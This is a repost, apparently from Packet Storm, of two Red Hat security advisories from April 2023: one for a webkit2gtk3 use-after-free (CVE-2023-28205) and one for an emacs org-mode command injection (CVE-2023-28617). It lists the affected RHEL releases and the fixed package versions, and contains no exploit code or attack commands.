Red Hat Security Advisory 2023-1918-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1918-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1918  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_1.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgmdzjgjWX9erEAQi06Q/9GQC0R4zJg84qKELW972t3dpQMX4djnuK  
5TKnsEBPT3PH3R8yRdQTlxdGP9shDJe5OvJROF1olLczpo2kgoaI4tyW+UcRHPvi  
hQkoKv+PbY/pxyZHj+GFo6laoTHsvGp29m5KC6W8djsvxR+Iwdhzaim/WJMl5JvR  
MmmwUOd+An+4zk61wKuT4vEJWh3P+oyieO4bbSIUh5GOYNwuCcgYNtuLcw6ar1AM  
r6INmhZ5AzEJNLiSc0AYjXolDhv+sKQ6aCZ6k4QudlCPCOLvlbIECda70hWP+UbX  
O3dTXjH4bCwiv+OwhMc6fQbAcL1HCuVYbzsvwfSsh/iYTZfn5KgnIjhG3xANnyu9  
izEimPb0sklj0ubdEe/VuqOF4y/pZWkrzoXUnxFg+vVDplGtV94EobL8C/uHwjEI  
lzZahd3DITpDmA2vr6McP+TrZk5QUGvVgubBr6/RSlZOZzy7odifK6R2Nb9KWPHr  
uoYviORBRTKa15d2F86jlrdeWKVFC/uIEw85FBtfN+TiigbtonDp6scmwcznZEU9  
zAkM4hlS6tx5yYjky+RuxkgdFkL7J1q6/PqIJ2+TBVKiU+X78s4W1ITOs/5eBo7T  
uiCac2y7DkqP8vJoAMAmnavi1gOepZ9d/DeBwBY1Fa2pr1cdS8yhy546a51cMhLj  
FVsDcrY98uo=  
=SSir  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1918-01

Chrome has an issue where the GL_ShaderBinary is exposed to untrusted processes.

Chrome GL_ShaderBinary Untrusted Process Exposure

Red Hat Security Advisory 2023-1915-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:1915-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1915  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28617   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - noarch  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - noarch  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in org-mode (CVE-2023-28617)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180544 - CVE-2023-28617 emacs: command injection vulnerability in org-mode

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28617  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgltzjgjWX9erEAQj/Nw//V0aoP/jRKLJkGKH0Pp4bgDB+8e01K9Q6  
Ig6dwbkmJ0/s2pvq+7xYKLDPuCUcD+4NojVtoWhCTIEfcFx2thvFoD4jgAL1jjTR  
WNhFxhnrkQ6VCpgMa4uZnxQXFgzW3UOyKADZdjyqqV1cRr/ntrXrCwMRzsZq4/pf  
xcp2voH+zgkDhTd62q+r35oPqYG+ItOACr5psSQ+isLNliX8fWXKInU1qecwV29V  
l/+piIQqVE7uEMUAYYyV+VbgmXYgVA95Q0ILQ3Sf/x/csD2pwYvEl/Mn4w5MoAil  
xfayd2G5ocIfCCaN4aJp0FhiGdTd4CYy3SKzWPJ3EShaluyNncEWapOMb0BTZXq6  
Mo/pDTy78Qt4Le5U5xcAfs9227KH606VETAsCJJQpyh/AzlZDxc/6urOWmlYCRl2  
GDwS+FTtQHhV8dXcqCH3/tdcwJZ1Et7faQVE3O+Dh6QorqX4wJDleCIYhabHd1gh  
1vQylU3vU2FZkKpjEhG3qbvK4g49fHt96MD77hbzxQc+m+5Z9xL9N4MtUGGP/sly  
XlOz5Nl1dhjM3ghoj3R5Dkm6obX28uuZXUNyf+xeud0v8urHhg7sS44+HFMjQiZA  
SLEZGLpAXC9COvaHElO6IwgEv/xuPoecFmbzkQ/ly16sDpz8Bkdr7xnfLn35khVW  
/2W4C5DXDw4=  
=BXIt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm